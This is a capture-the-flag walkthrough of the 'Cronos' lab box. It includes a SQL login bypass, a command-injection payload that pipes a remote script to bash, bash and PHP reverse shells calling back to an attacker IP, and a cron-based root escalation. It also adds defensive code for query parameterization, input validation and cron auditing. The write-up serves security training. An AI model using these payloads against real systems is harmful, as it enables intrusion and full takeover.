Cronos

Created
Mar 1, 2024 04:57 PM
Updated
Last updated March 1, 2024
Tags
Penetration Tester Level 3
CVE
Command Injection
Attachments
Difficulty
MEDIUM
⚠️ Disclaimer: the techniques, ideas and tools in this article are provided only for security-oriented learning and exchange. If you do not agree, please close this page. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves.

ℹ️ Target information


🔍 Port scan

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ cat allports.txt
# Nmap 7.92 scan initiated Fri Apr 8 22:42:51 2022 as: nmap -v -sS -Pn -p- --max-retries=0 -oN allports.txt -oX allports.xml 10.10.10.13
Warning: 10.10.10.13 giving up on port because retransmission cap hit (0).
adjust_timeouts2: packet supposedly had rtt of -1937707 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1937707 microseconds.  Ignoring time.
Nmap scan report for admin.cronos.htb (10.10.10.13)
Host is up (0.34s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Apr 8 22:51:54 2022 -- 1 IP address (1 host up) scanned in 542.70 seconds

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ cat nmap.txt
# Nmap 7.92 scan initiated Fri Apr 8 22:51:54 2022 as: nmap -sV -sC -p 22,53,80 -Pn -oN nmap.txt -oX nmap.xml 10.10.10.13
Nmap scan report for admin.cronos.htb (10.10.10.13)
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Login Page
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 8 22:52:12 2022 -- 1 IP address (1 host up) scanned in 17.79 seconds

🤔 Recon analysis

The target has port 53 open; let's see which domain names it holds records for.
 
┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ dig -x 10.10.10.13 @10.10.10.13

; <<>> DiG 9.18.0-2-Debian <<>> -x 10.10.10.13 @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64669
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;13.10.10.10.in-addr.arpa.      IN      PTR

;; ANSWER SECTION:
13.10.10.10.in-addr.arpa. 604800 IN     PTR     ns1.cronos.htb.

;; AUTHORITY SECTION:
10.10.10.in-addr.arpa.  604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 388 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (UDP)
;; WHEN: Fri Apr 08 23:06:10 CST 2022
;; MSG SIZE  rcvd: 111

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 407 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Fri Apr 08 23:05:37 CST 2022
;; XFR size: 7 records (messages 1, bytes 203)
The zone transfer succeeds and reveals two main hostnames, www.cronos.htb and admin.cronos.htb. Add them to /etc/hosts, then browse to the web sites and see what's there.

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.13 admin.cronos.htb www.cronos.htb
Nothing useful on www.cronos.htb.

admin.cronos.htb shows a login form, so first try the classic auth-bypass payload admin' -- -

Lucky: we're in, and the page behind the login is a classic command injection. Enter commands in it to try the attack.
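Why the admin' -- - payload logs you in, and the query shape that stops it, as an added example that is not part of this writeup: the in-memory table, the account and the SHA-256 stand-in for a password hash are constructed here, and the real login code on admin.cronos.htb is not shown on the page.

```python
import hashlib
import sqlite3

# The bypass string the writeup types into the login form.
BYPASS_USERNAME = "admin' -- -"


def hash_password(password: str) -> str:
    # Unsalted SHA-256 stands in for a real password hash (use bcrypt/argon2 in practice);
    # it plays no part in the injection, which never reaches the password comparison.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account (not the box's database)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", ("admin", hash_password("correct-horse")))
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Query built by string concatenation, the pattern the bypass relies on."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + hash_password(password) + "'")
    # With the bypass the SQL becomes:
    #   SELECT username FROM users WHERE username = 'admin' -- -' AND password = '...'
    # The quote closes the literal and `--` comments out the password check entirely.
    return con.execute(query).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the username is sent as data, never as SQL text."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row is not None


def demo() -> dict:
    con = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(con, BYPASS_USERNAME, "anything"),  # True
        "safe_bypass": login_safe(con, BYPASS_USERNAME, "anything"),              # False
        "safe_real_login": login_safe(con, "admin", "correct-horse"),             # True
    }


if __name__ == "__main__":
    print(demo())
```

The parameterized version still lets the real admin in with the real password; only the concatenated version accepts the payload, because the quote character is interpreted as SQL syntax instead of as part of the username.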

💥 Exploitation

Getting user.txt

Create the reverse-shell script

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ cat liona.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.26/1234 0>&1

Start an HTTP server

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
 
Listen on the port

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

In the page's command box, enter 8.8.8.8; curl 10.10.14.26/liona.sh | bash

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:55854.
bash: cannot set terminal process group (1406): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$

Got the reverse shell.

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:55854.
bash: cannot set terminal process group (1406): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ ls /home
ls /home
noulis
www-data@cronos:/var/www/admin$ cat /home/noulis/user.txt
cat /home/noulis/user.txt
51d236438b333970dbba7dc3089be33b
www-data@cronos:/var/www/admin$
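The input-handling pattern behind the command injection above, shown as a vulnerable command builder beside a hardened one. This is an added example, not code from the writeup or from the box: the ping tool, the function names and the request value are assumptions, since the admin.cronos.htb source is not shown on the page.

```python
import ipaddress
import subprocess
from typing import Dict, List, Optional

# The value the writeup submits in the command box (constructed here as test input).
INJECTED = "8.8.8.8; curl 10.10.14.26/liona.sh | bash"


def build_command_vulnerable(host: str) -> str:
    # One string handed to a shell (shell_exec() in PHP, shell=True in Python):
    # ';' terminates ping and the shell runs whatever follows as a second command.
    return "ping -c 1 " + host


def parse_host(host: str) -> Optional[str]:
    # Allow-list: the value must parse as a literal IPv4/IPv6 address.
    # Anything else (hostnames, spaces, ';', '|', '`', '$(') is rejected.
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        return None


def handle_ping_request(host: str) -> Dict[str, object]:
    """Hardened handler: validate first, then build an argv list with no shell involved."""
    ip = parse_host(host)
    if ip is None:
        return {"accepted": False, "argv": None, "error": "host must be an IP address"}
    argv: List[str] = ["ping", "-c", "1", ip]
    return {"accepted": True, "argv": argv, "error": None}


def run_ping(host: str) -> int:
    """Execute the validated argv; subprocess.run with a list never invokes /bin/sh,
    so even a value that slipped past validation would reach ping as a single argument."""
    decision = handle_ping_request(host)
    if not decision["accepted"]:
        raise ValueError(decision["error"])
    return subprocess.run(decision["argv"], capture_output=True, timeout=10).returncode


if __name__ == "__main__":
    print(build_command_vulnerable(INJECTED))   # the string a shell would happily run
    print(handle_ping_request(INJECTED))        # rejected before any process starts
    print(handle_ping_request("8.8.8.8"))       # accepted as a four-element argv
```

Both halves matter: validation rejects the payload at the boundary, and the argv form means the shell is never part of the call path. If hostnames must be accepted, validate them against a strict hostname pattern and keep the argv form; never fall back to a concatenated string.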

Getting root.txt

Check sudo

www-data@cronos:/var/www/admin$ sudo
sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
www-data@cronos:/var/www/admin$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@cronos:/var/www/admin$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@cronos:/var/www/admin$ sudo -l
sudo -l
[sudo] password for www-data:

It asks for a password. Let's look for a privilege-escalation path instead and check the processes.

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

www-data@cronos:/var/www/admin$ cd /tmp
www-data@cronos:/tmp$ curl 10.10.14.26/linpeas.sh | bash
Found that /var/www/laravel/artisan is executed periodically.

www-data@cronos:/var/www/laravel$ ls -al
ls -al
total 2012
drwxr-xr-x 13 www-data www-data    4096 Apr  9  2017 .
drwxr-xr-x  5 root     root        4096 Apr  9  2017 ..
-rw-r--r--  1 www-data www-data     572 Apr  9  2017 .env
drwxr-xr-x  8 www-data www-data    4096 Apr  9  2017 .git
-rw-r--r--  1 www-data www-data     111 Apr  9  2017 .gitattributes
-rw-r--r--  1 www-data www-data     117 Apr  9  2017 .gitignore
-rw-r--r--  1 www-data www-data     727 Apr  9  2017 CHANGELOG.md
drwxr-xr-x  6 www-data www-data    4096 Apr  9  2017 app
-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan
drwxr-xr-x  3 www-data www-data    4096 Apr  9  2017 bootstrap
-rw-r--r--  1 www-data www-data    1300 Apr  9  2017 composer.json
-rw-r--r--  1 www-data www-data  121424 Apr  9  2017 composer.lock
-rwxr-xr-x  1 www-data www-data 1836198 Apr  9  2017 composer.phar
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 config
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 database
-rw-r--r--  1 www-data www-data    1062 Apr  9  2017 package.json
-rw-r--r--  1 www-data www-data    1055 Apr  9  2017 phpunit.xml
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 public
-rw-r--r--  1 www-data www-data    3424 Apr  9  2017 readme.md
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 resources
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 routes
-rw-r--r--  1 www-data www-data     563 Apr  9  2017 server.php
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 storage
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 tests
drwxr-xr-x 31 www-data www-data    4096 Apr  9  2017 vendor
-rw-r--r--  1 www-data www-data     555 Apr  9  2017 webpack.mix.js
www-data@cronos:/var/www/laravel$

The file is owned by www-data, so we have write access to it and can simply use it: create a PHP payload locally and download it into place.

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ cat artisan
<?php echo shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.26/2345 0>&1'") ?>

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ nc -nvlp 2345
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345

www-data@cronos:/var/www/laravel$ wget http://10.10.14.26/artisan
wget http://10.10.14.26/artisan
--2022-04-08 18:54:38--  http://10.10.14.26/artisan
Connecting to 10.10.14.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 76 [application/octet-stream]
Saving to: 'artisan'

artisan             100%[===================>]      76  --.-KB/s    in 0s

2022-04-08 18:54:39 (15.6 MB/s) - 'artisan' saved [76/76]

www-data@cronos:/var/www/laravel$ ls -al
ls -al
total 2012
drwxr-xr-x 13 www-data www-data    4096 Apr  8 18:54 .
drwxr-xr-x  5 root     root        4096 Apr  9  2017 ..
-rw-r--r--  1 www-data www-data     572 Apr  9  2017 .env
drwxr-xr-x  8 www-data www-data    4096 Apr  9  2017 .git
-rw-r--r--  1 www-data www-data     111 Apr  9  2017 .gitattributes
-rw-r--r--  1 www-data www-data     117 Apr  9  2017 .gitignore
-rw-r--r--  1 www-data www-data     727 Apr  9  2017 CHANGELOG.md
drwxr-xr-x  6 www-data www-data    4096 Apr  9  2017 app
-rw-r--r--  1 www-data www-data      76 Apr  8 18:47 artisan
drwxr-xr-x  3 www-data www-data    4096 Apr  9  2017 bootstrap
-rw-r--r--  1 www-data www-data    1300 Apr  9  2017 composer.json
-rw-r--r--  1 www-data www-data  121424 Apr  9  2017 composer.lock
-rwxr-xr-x  1 www-data www-data 1836198 Apr  9  2017 composer.phar
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 config
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 database
-rw-r--r--  1 www-data www-data    1062 Apr  9  2017 package.json
-rw-r--r--  1 www-data www-data    1055 Apr  9  2017 phpunit.xml
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 public
-rw-r--r--  1 www-data www-data    3424 Apr  9  2017 readme.md
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 resources
drwxr-xr-x  2 www-data www-data    4096 Apr  9  2017 routes
-rw-r--r--  1 www-data www-data     563 Apr  9  2017 server.php
drwxr-xr-x  5 www-data www-data    4096 Apr  9  2017 storage
drwxr-xr-x  4 www-data www-data    4096 Apr  9  2017 tests
drwxr-xr-x 31 www-data www-data    4096 Apr  9  2017 vendor
-rw-r--r--  1 www-data www-data     555 Apr  9  2017 webpack.mix.js
www-data@cronos:/var/www/laravel$ chmod +x artisan
chmod +x artisan
www-data@cronos:/var/www/laravel$

┌──(liona㉿kali)-[~/Workspace/HTB/Cronos]
└─$ nc -nvlp 2345
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:38964.
bash: cannot set terminal process group (458): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# cat /root/root.txt
cat /root/root.txt
1703b8a3c9a8dde879942c79d02fd3a0
root@cronos:~#
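The root shell arrives because a scheduled job running as root executes a file that www-data owns. The audit below, an added example that is not part of the writeup, is the check a defender would run to catch that misconfiguration: for every crontab job it resolves the program and script paths and flags any that are owned by a different user than the one the job runs as, or that are group- or world-writable. The crontab text and the file ownership table are constructed for the demo (modelled on the box, not copied from it); file_info_from_disk is the lookup to use on a live host.

```python
import os
import pwd
import re
import shlex
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class FileInfo:
    owner: str   # user name that owns the file
    mode: int    # permission bits, e.g. 0o755


def file_info_from_disk(path: str) -> Optional[FileInfo]:
    """Real lookup for a live host (the demo below uses a constructed table instead)."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))


INTERPRETERS = {"php", "python", "python3", "perl", "sh", "bash"}
SCHEDULE_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")


def parse_cron_line(line: str, default_user: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (user, command) for a job line, or None for comments, blanks and VAR=value.
    default_user=None selects /etc/crontab format, where a user field follows the schedule."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    m = SCHEDULE_RE.match(line)
    if not m:
        return None
    rest = m.group(1)
    if default_user is not None:
        return default_user, rest
    parts = rest.split(None, 1)
    return (parts[0], parts[1]) if len(parts) == 2 else None


def executed_paths(command: str) -> List[str]:
    """Absolute paths the job will execute: each program given by absolute path and,
    when the program is an interpreter such as php, its first absolute-path argument."""
    paths: List[str] = []
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):
        try:
            words = shlex.split(segment)
        except ValueError:
            continue
        if not words:
            continue
        if words[0].startswith("/"):
            paths.append(words[0])
        if os.path.basename(words[0]) in INTERPRETERS:
            script = next((w for w in words[1:] if w.startswith("/")), None)
            if script:
                paths.append(script)
    return paths


def audit_crontab(lines, default_user: Optional[str],
                  lookup: Callable[[str], Optional[FileInfo]]) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for line in lines:
        job = parse_cron_line(line, default_user)
        if job is None:
            continue
        user, command = job
        for path in executed_paths(command):
            info = lookup(path)
            if info is None:
                findings.append({"path": path, "cron_user": user, "reason": "missing",
                                 "detail": "target does not exist"})
                continue
            if info.owner != user:
                findings.append({"path": path, "cron_user": user, "reason": "owner-mismatch",
                                 "detail": f"owned by {info.owner}, executed as {user}"})
            if info.mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append({"path": path, "cron_user": user, "reason": "group-or-world-writable",
                                 "detail": f"mode {info.mode:o}"})
    return findings


# Constructed root crontab and ownership table for the demo (not the box's real files).
ROOT_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
0 3 * * * /usr/local/sbin/backup.sh
30 4 * * * /opt/scripts/rotate.sh
"""
SAMPLE_FILES: Dict[str, FileInfo] = {
    "/var/www/laravel/artisan": FileInfo("www-data", 0o755),   # the Cronos pattern
    "/usr/local/sbin/backup.sh": FileInfo("root", 0o755),      # fine
    "/opt/scripts/rotate.sh": FileInfo("root", 0o777),         # root-owned but world-writable
}


if __name__ == "__main__":
    for f in audit_crontab(ROOT_CRONTAB.splitlines(), "root", SAMPLE_FILES.get):
        print(f"{f['reason']:24} {f['path']}  ({f['detail']})")
```

The fix the audit points at is the usual one: anything root executes on a schedule lives in a root-owned directory with mode 755 or tighter, and a web application's code base is never on that list. On a live host, pass file_info_from_disk as the lookup and feed it /etc/crontab (default_user=None), the files under /etc/cron.d, and each user's crontab with that user as default_user.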

📝 Summary

Key points

  • Local privilege escalation
  • Writing a reverse shell

Tips

  • Use Python to spawn a full PTY
  • On a login form, try the classic bypass admin' -- - first

References

  1. https://www.bilibili.com/video/BV14F411n76z?p=1&t=1088